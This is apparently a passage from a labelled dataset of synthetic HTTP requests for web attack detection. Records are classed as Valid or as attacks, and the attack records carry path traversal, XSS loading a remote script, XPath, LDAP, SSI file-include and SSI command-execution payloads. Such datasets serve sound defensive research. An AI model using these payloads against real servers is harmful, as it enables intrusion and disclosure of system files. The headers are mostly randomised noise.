Referer: http://NIm0.it/s6ttkr/d0oismme/ridinAa/6nJdnBfc.pdf
TE: deflate,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/4.4 (Windows; U; WinNT 0.5; aT-el; rv:7.6.7) Gecko/89539390
UA-CPU: 68000
UA-Disp: 7368,0111,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2602x876
Via: 0.3 www.eMmdenr.tiff
Transfer-Encoding: compress
Upgrade: pno/2.0, 92s3t/7.4, hio/3.0
Warning: 593 www.czyane.jpg "hnn6i2Nors" "Sun, 24 Jun 07 01:56:04 GMT"
X-Forwarded-For: 136.200.162.240
X-Serial-Number: 1613720445559
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16253
Start - Id: 44867
class: PathTransversal
GET /WadietAidjpd/asNWKH4HcZoEURWw-/x9WuV.cfm?tso3eocngcNeadh=%290ddwtelta&sh=rU0&weewtAui=sULfU&yneeVnudataga=97548&6hqog=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&ehho6sEibiFpa=9837667&em=q%28shainsert%3Cnstyy&Malhvvosh=35&3WRgX7Y=4847&eEh=34&ee=%7Eretw5e+Ubs%3Fa7i&qhqhl8g=xp_%3Bnullacatcnkyrwp-systemL HTTP/1.0
Host: 55.54.249.194
Connection: keep-alive
Accept: text/html;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 17.82.53.2
Cookie: UimOtoYnIe=n1;Esct=98722;fpeioidrtTrrh=ce6cvarnywget;Ieawindow.open=shutdown+9rt
Cookie2: $Version="27"
Date: Mon, 19 Jan 09 20:07:28 UTC
ETag: "1zhRIGqs9bhrirWiAR"
Expect: 100-continue
From: alne@9raesl8.gov
If-Modified-Since: Sun, 05 Feb 06 03:07:51 UTC
If-Unmodified-Since: Sat, 09 Aug 08 23:07:53 CET
If-Match: "pmfY041lx7FgKFTLov"
If-None-Match: "UunXHK8cxJ-@RnFOhpj"
If-Range: *
Max-Forwards: 12
MIME-Version: 5.3
Pragma: igf8ip=6mthTY
Proxy-Authorization: boirwt l8nta=oels3is
Authorization: Basic bmdwbzpjc3RMbWU=
Range: 165-47102,-98
Referer: http://Hjtoikt.biz/hipdhtg/EAl7i/aleam3o.js
TE: trailers,deflate
Trailer: Referer
User-Agent: cw9adie/5.1.5.9
UA-CPU: PowerPC
UA-Disp: 280,070,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 458x842
Via: 1.3 www.pseesld.js
Transfer-Encoding: compress
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 14283566548757550982
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44867
Start - Id: 47725
class: XSS
GET /rbiRlwEaC7RyO/0select-Qwindow.openjrcpA.1O/aqpO7Yge@FZHH_eZRAL/aLtIpCfINbC/DZJEt/dQFMiUBrKHWU/a32hh/QSaxLAall.gDI_/1rwafceoia2t.png?n1hl2hAnh=shy&g-C4@iZH=1123209&ooS=xtmoht&pltl1uasz=spte&nr5=n9fn&ohtt5l1c=sfi&ezae=ndihios&ehmnvJitQ=831&3d3datatnu=87&sedbiecwltn=54351923&0a=pwse&nph-QpbGt=e%3CM%40gowna3aca&uuswlNmttr3hn8l=%3Cdiv++style++%3D+++%22++++binding%3A++url%28%5Bhttp%3A%2F%2Fwww.elonnd.com%2Fscript%2FEooaHa.aspx%5D%29%3B++++%22+++%3E&connect5P_sa=u HTTP/1.0
Host: 121.153.160.20
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 90.114.63.204
Cookie: uieotsn=tlmsi;Rf6UkHFC5k_=likea%24-b%24%28copycro;wgetAexecLN2J%uI6K=nleliket
Cookie2: $Version="0"
Date: Tue, 15 Sep 09 14:38:07 UTC
ETag: "3NoB8gEdJ4qpGAoUK"
Expect: 100-continue
From: aonie0x@uTdtewu.be
If-Modified-Since: Sat, 01 Nov 08 22:33:54 GMT
If-Unmodified-Since: Wed, 22 Feb 06 24:05:12 CET
If-Match: "bQ1qSlQyifULxETmgjKS"
If-None-Match: "gga56pZViP-pPxuf@g8W"
If-Range: *
Max-Forwards: 0
MIME-Version: 0.5
Pragma: Ne='SeAeW'
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: ep9mla t3deafei=hrshcr
Range: 2174-,56-,-57382
Referer: http://dAhe.de/tekEn.wmn
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: mda4aXi/5.3
UA-CPU: 68000
UA-Disp: 2301,334,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0710x100
Via: HTTP/6.7 www.elhl.htm:9
Transfer-Encoding: compress
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 499 www.ObTif.js "Thryti" 
X-Forwarded-For: 1.179.155.203
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47725
Start - Id: 12851
class: Valid
GET /eV.vvloy4bwdvHE/dtuDa4rdtuu/3BBu_tTS/rCudApXg.e6nDz4B_xR/cX_nEbG/V4DaNs/s7HuSRKTKD7aLtaVoOBO.msf?Satd=mreaot&zyAck8men5=uaahaving%3Ctmpoaxtmp&2RNowgOesdlnehn=nOa9VC_E&Ns9tngowe=3hs+AlsdocumentEr+%3Ddereplaced%5DCsrm HTTP/1.1
Host: www.tnH4uE3uet.fr
Connection: mmse9zr
Accept: text/*, audio/x-wav;q=0.3, text/*
Accept-Charset: gb2312;q=0.6
Accept-Encoding: identity;q=0.3, compress, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 215.33.179.223
Cookie: t9=oninr8ciser1
Cookie2: $Version="3"
Date: Thu, 02 Apr 09 08:06:14 GMT
ETag: "WU-5gxwcCX1t42G2qlC"
Expect: onhBe
From: iirE@eyRmP2.biz
If-Modified-Since: Wed, 02 Sep 09 21:48:49 GMT
If-Unmodified-Since: Sun, 15 Aug 04 06:04:56 GMT
If-Match: *
If-None-Match: "5t1UQvKTgEhaf-M"
If-Range: "pUXiYpH3If.YPIoT"
Max-Forwards: 13
MIME-Version: 7.5
Pragma: 87Sehmhc='awg'
Proxy-Authorization: Basic ZG5yVzphZGxldHk=
Authorization: Digest qop=auth
Range: 98709-37276,-196
Referer: /hlmu/eetest4.jpg
TE: trailers,trailers,chunked;q=0.0
Trailer: Host
User-Agent: stopseeks
UA-CPU: Sparc
UA-Disp: 662,803,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0320x5347
Via: FTP/1.1 www.Spissoi.gif, HTTP/8.6 132.236.131.185
Transfer-Encoding: deflate
Upgrade: zoadt/1.0
Warning: 488 www.lodbguse.png "rual3unoeiiUnaelq" 
X-Forwarded-For: 91.199.65.166
X-Serial-Number: 267270605384116
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12851
Start - Id: 14840
class: Valid
GET /eexdRwyAfbi9tydi/cbAoDfefVlkrfof/tneftt9OoER1Tfayey/ho/oYxq0b/oUtnntvptheutflEho/lv6SaiQU.-78762Ob5/t2Urnh4xFdB/ttNte0tp/lz6BBHoG-zURR-/ramu2ts5Ignar2c/e.tyJma-UVFHujn-.exe? HTTP/1.1
Host: 69.22.252.47
Connection: lzrc7cxt
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: eeicrs-d4lnde9s, j-mte7, laD-1t;q=0.0, eiiersu-ooc;q=0.5
Cache-Control: no-store
Client-ip: 35.5.220.119
Cookie: cth9r=neead9eRatg;qreee=811729837;ioutgftCttho=e7dc3?)eopt
Cookie2: $Version="33"
Date: Sat, 31 Jul 04 04:14:59 CET
ETag: W/"wX@sIpIys_g7Xdfl"
Expect: minii
From: se5tmG@5hndem.ch
If-Modified-Since: Sun, 06 Nov 05 05:34:39 GMT
If-Unmodified-Since: Thu, 28 Jun 07 18:47:11 GMT
If-Match: *
If-None-Match: *
If-Range: "ar-36AbNgQ.81JmKt-"
Max-Forwards: 090
MIME-Version: 2.8
Pragma: urge=nmdi
Proxy-Authorization: Basic cWVhYzp3ZHJOdGFrZQ==
Authorization: NTLM aWRIb3lhczlvc3Njc2hsc2VmZnJNZ2JpenRzNGVMc2F2aTJF
Range: 974110-
Referer: http://www.gbstKib.ch/itpbc/uip5ng/ttcrhn.php3
TE: trailers
Trailer: Host
User-Agent: aduist (dwAAP0Kc)
UA-CPU: 68000
UA-Disp: 1041,483,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 923x8805
Via: 0.8 www.oig2.gif:8145, rdi/5.0 143.56.193.24:208
Transfer-Encoding: deflate
Upgrade: altl/2.2
Warning: 396 135.99.201.170 "ensfieereprG" 
X-Forwarded-For: 175.103.200.117
X-Serial-Number: 89813
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14840
Start - Id: 23722
class: Valid
GET /.ytKUreplace2RIQ6/ebvatespnrah/ndyaqS3/e8YXk6BuiUewu/To/niaEsseblsotl1bls/afcurr/e_5JvWZ3g/lM9n3.8Nu-8/curoyqeu/A2ersigto.css?pdedecxdnojyia=1881307&LTQcTd@=osu&tiegmgsr4nIfei=gqemuw&arhneolewke=pbeonseioadiwkoi&dedtLcsU=ojV1wdRHoe&Toahe=iIer&dooeslbsllbleio=h%29p+y+&uYdwtlrytjmhi0p=a16c5aV%4021&aequ=%7CrnttmlibXeaaf%283%7Co2db HTTP/1.0
Host: www.ttaRoehA.fr
Connection: ootz
Accept: application/rtf, image/jpeg
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 232.149.111.235
Cookie: nsojA=tetooosloewja6;hpra=ekvcTa<gna qNss
Cookie2: $Version="45"
Date: Sat, 08 Jan 05 22:32:18 UTC
ETag: W/"XNE2Ei4pOYWMUMOWeFS"
Expect: syfohtr=idEz
From: SDcfto@h1dceuR3.cz
If-Modified-Since: Mon, 19 Nov 07 13:50:06 UTC
If-Unmodified-Since: Mon, 12 Feb 07 21:59:08 CET
If-Match: *
If-None-Match: ".nuvdGo14-zlQMGu.S7K"
If-Range: *
Max-Forwards: 3
MIME-Version: 4.4
Pragma: a=sphwh2It
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: dsuae otp9=inl7iat
Range: 88-,49-031,14468-474
Referer: /Qatl/nFqaowet/92oxoenh.php4
TE: trailers,gzip;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/9.4 (compatible; Konqueror/7.0; Linux i386; htnt5metb)
UA-CPU: Sparc
UA-Disp: 807,314,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 431x276
Via: HTTP/2.0 129.64.145.144
Transfer-Encoding: compress
Upgrade: Oias/7.2, yee/0.3
Warning: 169 20.110.71.138:174 "Xuulgeai2thhnsm" "Tue, 19 May 09 22:55:23 CET"
X-Forwarded-For: 204.159.198.225
X-Serial-Number: 13224
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23722
Start - Id: 31206
class: Valid
GET /ZW3/netcatjfZbfS/o2o4uFBuzWaG/aG_.1vDFN/aziEDCs5Wms-R5g@mq.jsp?ETuadeahis8qeo=libOa&oAeferst=nXsI5dW38X&feeUukbntd0etf=sfkpred0aasoAo HTTP/1.1
Host: www.eesen.it
Connection: t6tT
Accept: */*
Accept-Charset: x-mac-ce;q=0.4, x-mac-arabic
Accept-Encoding: deflate;q=0.4, identity;q=0.4
Accept-Language: *;q=0.3
Cache-Control: max-age=60
Client-ip: 223.129.57.184
Cookie: CrijhamnnKle=l9kAW;@LmQZ=nHj;3de=%eahn<tw
Cookie2: $Version="19"
Date: Sat, 09 Sep 06 07:25:01 GMT
ETag: "FF2Tro_rtx4@In80J"
Expect: 100-continue
From: doe5j@7rdh4elrd.de
If-Modified-Since: Mon, 07 Jun 04 05:29:47 GMT
If-Unmodified-Since: Fri, 05 Oct 07 17:58:24 UTC
If-Match: "mZd4Qq99qew-I80-"
If-None-Match: *
If-Range: Fri, 01 Jan 10 18:47:31 GMT
Max-Forwards: 8
MIME-Version: 2.8
Pragma: aOauas='m'
Proxy-Authorization: teu2uo dsgreat=oatpaa5a
Authorization: NTLM Ym5tMGFuT29lbWVlc21uNW50bmJvb2U1bHNpZ2xuYWVrYVRlZXJhb2F3bHNlc0xz
Range: 487-253698,1-,198-1
Referer: http://nutoDhoj.net/arerel/treomofo.tar
TE: gzip,deflate;q=0.8,chunked;q=0.7
Trailer: Expect
User-Agent: Mozilla/4.9 (compatible; Konqueror/3.4; WinNT; ouov)
UA-CPU: x86
UA-Disp: 974,643,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5346x423
Via: FTP/4.5 203.197.122.238:4, 2.2 147.45.72.150
Transfer-Encoding: compress
Upgrade: h3ih9e/0.0, 7mwpye/2.3, Es0/2.7, atargv/1.8
Warning: 816 106.144.10.255 "FhwteaHn0a" "Wed, 27 May 09 19:09:38 UTC"
X-Forwarded-For: 169.197.9.202
X-Serial-Number: 7658038309
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31206
Start - Id: 35802
class: XPathInjection
GET /n1H6X.J9h93@PUO/71QXn-fCHdcqW6V/cw/e-e@6BPDc747quyE8/nhhej/eZ9Fso.v.SG/60s/Xtema1m/SntuanMioo7l/mnoresQK3hflqMjA2/lssD/RWf4.jpg?bqOnCl=+&laeNaiargAra11d=EAok1&lDMiGOFUECselect=wxterm%7Et&rLPnltc=rb7fx6F&ete=b&aooa=cpfroma%7E8gInT%3Ee%28m&nqgathgt=9442198&ertTEiuAdtTybi=536669336&amtaeiict5uea=9oemia%27%5D+%7C+++++P+++++%7C+++++%2F%2Fuser%5B++name%2Ftext%28%29%3D+++%2736&ehe=taLdhTrnqsir&el1h=n%3Baah+r%5Bs%5Cynetcatsesock_stream%40itrl HTTP/1.1
Host: 79.153.34.91:692
Connection: deioxoyu
Accept: application/zip;q=0.9, text/html, video/quicktime
Accept-Charset: euc-jp, cp-936, iso-10646-ucs-2;q=0.7, x-mac-icelandic;q=0.2
Accept-Encoding: 
Accept-Language: bok-ds;q=0.4, awGT-nwi8ds, sT3zaRnn-epaw;q=0.5, e-xolhext, nsarmIiw-rsdoQwtc;q=0.2
Cache-Control: max-stale
Client-ip: 148.57.16.185
Cookie: Kx5qtelnetHGD=dnte
Cookie2: $Version="52"
Date: Thu, 19 May 05 21:38:49 CET
ETag: W/".LkKw7IuwRwvfgL-"
Expect: doIoeeq
From: gH0ez@Sireoah.fr
If-Modified-Since: Wed, 19 Jul 06 22:51:41 CET
If-Unmodified-Since: Sun, 03 Jun 07 08:15:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7375
MIME-Version: 9.7
Pragma: io3mm3dt='Urr'
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest opaque="rt7ngt"
Range: 205-0247
Referer: /asreet/tnonenew/odaiqes/liaaC.jpg
TE: chunked,deflate,trailers
Trailer: Expect
User-Agent: Mozilla/3.5 (Windows; U; Windows NT 8.3; wo-ln; rv:2.7.7) Gecko/22482414
UA-CPU: x86
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 0.7 97.3.176.16
Transfer-Encoding: identity
Upgrade: tmle/3.8
Warning: 463 52.135.104.34 "le3vso" 
X-Forwarded-For: 240.46.36.222
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35802
Start - Id: 26491
class: Valid
GET /cgXWtc6_s/rtT3XNpMBfS/oeEopcjzi7dfls4err6/aNcuXZtY1/nturoinda8202ke/dT6allspnapylemtwIAt/m@e7cV8c2YQe5/rBBp3mJO/xoif7kG/aed1gr6otdie56E.nsf? HTTP/1.0
Host: 38.186.144.156:7
Connection: close
Accept: audio/*;q=0.7, image/*
Accept-Charset: iso-8859-3
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 81.103.179.70
Cookie: 70httpspasswd9=;tlacceptecho;eZhet=2Yx;p3BdeeSro=hB3s
Cookie2: $Version="83"
Date: Thu, 06 Apr 06 21:21:50 GMT
ETag: W/"kpvX@IInxSxRK4Ag9@d"
Expect: imeiyeat=hnewk
From: r2Sewei@iiwioe8s.st
If-Modified-Since: Tue, 08 Apr 08 17:02:10 CET
If-Unmodified-Since: Sun, 20 Mar 05 02:34:20 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Jun 06 10:39:30 GMT
Max-Forwards: 098
MIME-Version: 5.1
Pragma: t8=ceTib
Proxy-Authorization: Basic OGh0bndTbjpvZHI3clNz
Authorization: Digest uri=http://niisrsn.be/jwA4lst/xdensa/dcs1iat/rehi.bin
Range: -394,77057-
Referer: /rcoj1/hewlt/ha0r/qmeii/alndo.htm
TE: gzip;q=0.2,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.9 (compatible; Konqueror/8.2; SunOS sun4u; eo3sen)
UA-CPU: StrongARM
UA-Disp: 9620,0046,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 701x092
Via: iynthc/7.9 95.61.55.90:44050, 7.2 197.182.194.47, 6.0 92.175.122.204
Transfer-Encoding: gzip
Upgrade: e7rni/4.8, eefgnj/9.6, ensu/8.5, oOfs/2.8
Warning: 623 17.27.132.164 "djromeklmscjmsfade" 
X-Forwarded-For: 135.109.117.133
X-Serial-Number: 7639559480776
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26491
Start - Id: 39719
class: SSI
GET /mCGKkH/Z7gusrW/BUuSkdM/nHU/t8_.htm?lnrfka6cjaukrM=5mthpa&Cakye3r=tRzFVqHE&mtlCbe=oastyle8%26a1htpass%25&nodeS5T0Xn8-=443&srheUocniIe=219&7ai=%3C%21--++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++++--%3E&epnsg3puiehbrd=oe&geplnaIo7=u HTTP/1.0
Host: 172.234.111.159
Connection: jr1odr
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: compress, gzip;q=0.6
Accept-Language: niw-Ea, cnc-h0ai;q=0.3
Cache-Control: no-store
Client-ip: 201.153.47.247
Cookie: tnc=2;ts5nr9x=128;etr=92789
Cookie2: $Version="27"
Date: Tue, 05 Dec 06 19:12:26 GMT
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Sat, 20 Jun 09 17:08:15 UTC
If-Unmodified-Since: Tue, 10 Mar 09 05:27:13 CET
If-Match: ".EbmB.K54B80ugH"
If-None-Match: *
If-Range: "LMELrdm0q4y3CH.e"
Max-Forwards: 2811
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: uoao sivueirq=ctprthen
Range: 61-,98874-5,222224-
Referer: /0orLaTol/eo5al/aroE/rheiti/m5ife.nsf
TE: trailers
Trailer: Host
User-Agent: Mozilla/5.4 (compatible; Konqueror/0.0; Unix; otetfi)
UA-CPU: x86
UA-Disp: 3264,053,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 066x3039
Via: 0.1 211.223.169.217
Transfer-Encoding: reheys
Upgrade: eoe/8.5, rhosn/0.5, slnwao/7.8
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 9911764547155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39719
Start - Id: 22522
class: Valid
GET /rsUz/looyriuT/oeGzs-uMmBBhKU@hV2/r5ps7Bliie/icg@lR/T9passwdV8-k6lOR/enhaXULFHF4C5zh8.tiff?n0tsrdhn9codxg=0610286&ndirihnitsbwbdi=+orthaa&siefaddimd=na%2B&gtnreoruyk=euitih0a8taOdtD&HeyGionbnD7zcie=js4tdal6&dhhEqectiweosR=2914006886&4LtquUhR3oatir=ioe&eg=euS1g7SKLU&ooe=010&6ewre9ErOVTcp=dEra HTTP/1.0
Host: 159.200.209.160
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-jp, windows-1254;q=0.1, iso-10646-ucs-2, euc-tw;q=0.2, euc-jp;q=0.9
Accept-Encoding: compress;q=0.4, gzip;q=0.8, gzip;q=0.9, gzip;q=0.8
Accept-Language: saOath-ereq96tt;q=0.9, x6nnwpj-c4spsab;q=0.3, Tiil0-nRA2u;q=0.1
Cache-Control: no-transform
Client-ip: 44.166.150.158
Cookie: heaTDo9i8n0e1ng=dcIVe;hs8ha=20;4areR=42671
Cookie2: $Version="796"
Date: Sun, 22 Aug 04 19:57:05 CET
ETag: W/"C.U2eKpr@4uFe7w"
Expect: qAtdme
From: ird3r@eilncwm.cz
If-Modified-Since: Sun, 12 Sep 04 19:31:18 UTC
If-Unmodified-Since: Wed, 23 May 07 20:21:10 UTC
If-Match: *
If-None-Match: "T8W6rYM0q65mtV0JG"
If-Range: *
Max-Forwards: 1
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="Oeoy"
Authorization: NTLM cmZlc2hwcnJnbkMzRWVsMXNpZU9ldGlvb2JzbVMxbm9Ec2llYWUwZW0zZXM=
Range: 97-403959,415744-,056-023107
Referer: http://tein.uk/ttaeeocz.bin
TE: gzip
Trailer: Connection
User-Agent: ttt40ga3oxre
UA-CPU: Sparc
UA-Disp: 3911,9683,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 568x5684
Via: HTTP/3.9 200.124.217.147, 2.8 10.145.140.74, 3.0 www.ishh.shtml
Transfer-Encoding: hxeR; aa46aOm=rxi0tgNi
Upgrade: yul/1.8, gvic/9.5, hGaw/6.7, Hpe/9.6, dae/2.3
Warning: 050 42.224.216.74 "terFienh" "Wed, 12 Mar 08 09:39:17 GMT"
X-Forwarded-For: 147.15.113.44
X-Serial-Number: 0827164
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22522
Start - Id: 36382
class: OsCommanding
GET /nrieLtrseictraIrslj/dkWEt0d6/l6_-q-fZU_X3SZFp/nbdOoxkyO.php?Bfsspnnasle=e HTTP/1.1
Host: 36.127.88.124
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: <!--   #exec  cmd="c:\progra~1\5loclo\sece2nyse\eUs.exe   d:\esBunogc0\www.ientic.org\srteaiEq\database.mdb   /x    exporttofoxpro"-->
Cache-Control: no-transform
Date: Fri, 16 Jul 04 19:46:35 GMT
If-Range: *
Max-Forwards: 3040
Referer: /cd8twuo/nueHp/sdgx/e99pnuad.htm
User-Agent: Mozilla/4.9 (compatible; PeaedgtaO; SunOS sun4u; ehS9him)

null

End - Id: 36382
Start - Id: 45138
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: www.acCnee.org
Connection: s7seybi
Accept: */*;q=0.6
Accept-Charset: euc-cn, iso-8859-3;q=0.8, iso-8859-3, gb2312
Accept-Encoding: identity, deflate, compress;q=0.0
Accept-Language: t-sossgre
Cache-Control: no-store
Client-ip: 217.130.119.31
Cookie: ar=rSaeJllGm;t@@87=85;eInv8ow=605;teealdid5mewsR=lwemDpPX6YVR
Cookie2: $Version="6"
Date: Wed, 26 Nov 08 24:05:11 GMT
ETag: W/"qlX4ysgfATZLcpalHWf0"
Expect: 100-continue
From: ydgsh@esUe.cz
If-Modified-Since: Tue, 07 Jun 05 15:56:38 CET
If-Unmodified-Since: Sun, 06 Mar 05 19:41:35 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Feb 09 01:03:48 UTC
Max-Forwards: 064
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Digest algorithm=aozyppmt
Range: -3,456-488022
Referer: http://yseedt.be/Ietevyc/oac2m4/htnn8nu.mpeg
TE: trailers,trailers
Trailer: Host
User-Agent: acEu (ntMfGBRAp)
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0464x327
Via: FTP/9.0 166.8.238.188, HTTP/6.7 253.117.130.111, ercei8/8.4 215.122.1.27
Transfer-Encoding: deflate
Upgrade: rnttO/3.2, lWf/3.6
Warning: 025 www.nahlde.gif "eybt2rrxaltN" "Sat, 01 Dec 07 10:33:12 UTC"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: ----------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45138
Start - Id: 5247
class: Valid
POST /Crrwqprcioagotsdldh/3rt7dtaMy3ajT4Eeiba/mu3tD3JunionFallqwhereV/eXVaU5SmrOu/oau/22fd3wY7oBlsiZ/e4iA.css? HTTP/1.0
Content-Length: 239
Content-Language: orn8sn,srpInl,nfese
Content-Encoding: deflate
Content-Location: /efsa.htm
Content-MD5: c09uUmU0aHVvZTdlc2F1dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Apr 06 12:42:55 UTC
Last-Modified: Sun, 27 Jun 04 09:16:27 CET
Host: www.settOtoweY.st
Connection: oxvbgo
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 78.163.7.145
Cookie: rtsoNmntohY=xKFChmku;h88oraS=2llybn2te8rtFls4
Cookie2: $Version="74"
Date: Fri, 27 Feb 04 16:15:52 CET
ETag: W/"VQJWXBbtX-vVHXeg"
Expect: 100-continue
From: nuccwnm@7ndfhebs.fr
If-Modified-Since: Sat, 24 Jun 06 06:07:42 UTC
If-Unmodified-Since: Tue, 26 May 09 13:24:23 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Jan 05 07:31:31 GMT
Max-Forwards: 2834
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM NDJhMjByZlVuaGFTdGN1YXcwbXRhYW44bkEyZ3dJb2h0bjNsZWVuTQ==
Authorization: NTLM ZG5tZWVvSG8zVGJuaHJ1bmVjaXJ0aGRpRXRubTNhb2RxcHNlejVhdHJhYWdlbg==
Range: 627-96060,029458-
Referer: http://i6ha5qg.ch/Otart/ae3DnT/Toercd/nebnnV/crOmir.php4
TE: chunked
Trailer: Max-Forwards
User-Agent: x8aigphpjnleb
UA-CPU: StrongARM
UA-Disp: 793,8160,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4414x768
Via: 5.4 www.v7rDtes.jpg
Transfer-Encoding: deflate
Upgrade: tMhm/1.0, C7euh/3.4
Warning: 362 www.tsihSe9.js "t0omneapbr2e9lmgou4g" "Fri, 03 Mar 06 12:16:45 UTC"
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 22844
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ie0e=itmandreplaceqEycexecNad3&66sb8f4=yipelrtghyrat&pnEopEhto=tertnoanelliaSf8&7nuz24=damntviy736c&atrnmmhaa=4854892372&OROobject= oSiP]sKerrposition6an&ptMjrATi0ZSD=:&JHRpasswdB2B451u=275&hooiEnns3cige5=s4oea;w&EGtDPXlP4=i-qXiTqf.N

End - Id: 5247
Start - Id: 37803
class: LdapInjection
GET /yhbF@Cjs8@xkQ1qmzKWx/hiromlwTdtente/@nunionqyMJTmrpI@qt/ddc/tyBoINc.D/ea5rf2dmIhvdnxne1S/E6access_log_d/p_uEMk5zXAI@HT3jpt/th/8VZinS-ldBq_eYsB.v7/childZWt6x9oEa.cfm?donh=atl&lDrmRin8wb=025&Vx@k2Z9_=et%29%28%26%28objectClass%3D++++20n*%29&Sa=4+Te&hveo=tbetweenneh&rlwyac=2103 HTTP/1.0
Host: 240.119.203.191:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-15, iso-2022-jp;q=0.6, windows-874
Accept-Encoding: 
Accept-Language: atmaea-dc;q=0.0, rsterqtr-radsel, 7-cne10re;q=0.3, hSOiON0-uN
Cache-Control: max-stale=5454
Client-ip: 148.220.0.143
Cookie: joedhhd=tM2df7pPx;sctsaan=ke;8Nsx3shee8cbN=soaieo;s5s=rnioar le
Cookie2: $Version="22"
Date: Tue, 05 Feb 08 13:50:31 CET
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: 100-continue
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sun, 20 Nov 05 20:20:41 GMT
If-Unmodified-Since: Wed, 24 Feb 10 10:15:45 CET
If-Match: *
If-None-Match: "hW.fIAZfKoFn4SpC6LX"
If-Range: *
Max-Forwards: 951
MIME-Version: 1.7
Pragma: ei=DiNn
Proxy-Authorization: nres 8iga8qk=JHmer
Authorization: Basic bmU0cjpzdGVhamQ=
Range: -1,56487-
Referer: /elaascm/mrt7nwnh/esdiaqtt.asp
TE: gzip,gzip;q=0.6,gzip
Trailer: Expect
